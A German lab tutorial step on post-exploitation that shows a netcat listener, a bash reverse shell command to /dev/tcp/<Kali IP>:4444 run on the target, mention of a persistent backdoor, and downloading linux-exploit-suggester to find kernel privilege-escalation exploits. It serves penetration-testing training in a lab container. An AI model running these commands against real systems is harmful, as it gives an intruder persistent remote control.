Nach-Ausnutzung und Privileg-Eskalation
In diesem Schritt werden wir versuchen, den Zugang zum Zielsystem nach erfolgreicher Ausnutzung einer Sicherheitslücke aufrechtzuerhalten und unsere Privilegien zu erhöhen.
Angenommen, Sie haben über eine Sicherheitslücke Zugang zum Zielsystem erlangt. Der nächste Schritt besteht darin, eine dauerhafte Hintertür (Backdoor) oder eine Reverse-Shell einzurichten. Dies ermöglicht es Ihnen, auch dann weiterhin Zugang zum System zu haben, wenn die anfängliche Sicherheitslücke gepatcht wird.
Eine Möglichkeit, eine Reverse-Shell einzurichten, ist die Verwendung des netcat
-Tools. Führen Sie auf dem Kali Linux-Container den folgenden Befehl aus:
nc -lvnp 4444
Dieser Befehl wartet auf eingehende Verbindungen auf Port 4444.
Führen Sie auf dem Zielsystem den folgenden Befehl aus, um eine Reverse-Shell einzurichten:
bash -c 'bash -i >& /dev/tcp/<Kali IP>/4444 0>&1'
Ersetzen Sie <Kali IP>
durch die IP-Adresse Ihres Kali Linux-Containers. Sie können ifconfig
verwenden, um die IP-Adresse Ihres Containers zu ermitteln.
Sobald die Reverse-Shell eingerichtet ist, können Sie versuchen, die Privilegien auf dem Zielsystem zu erhöhen. Eine häufige Technik besteht darin, nach Privileg-Eskalations-Sicherheitslücken mit dem linux-exploit-suggester
-Tool zu suchen:
wget https://raw.githubusercontent.com/mzet-/linux-exploit-suggester/master/linux-exploit-suggester.sh
chmod +x linux-exploit-suggester.sh
./linux-exploit-suggester.sh > /home/labex/linux-exploit-suggester.txt
Dieses Skript analysiert das Zielsystem und schlägt potenzielle Kernel-Exploits vor, die zur Privileg-Eskalation verwendet werden könnten.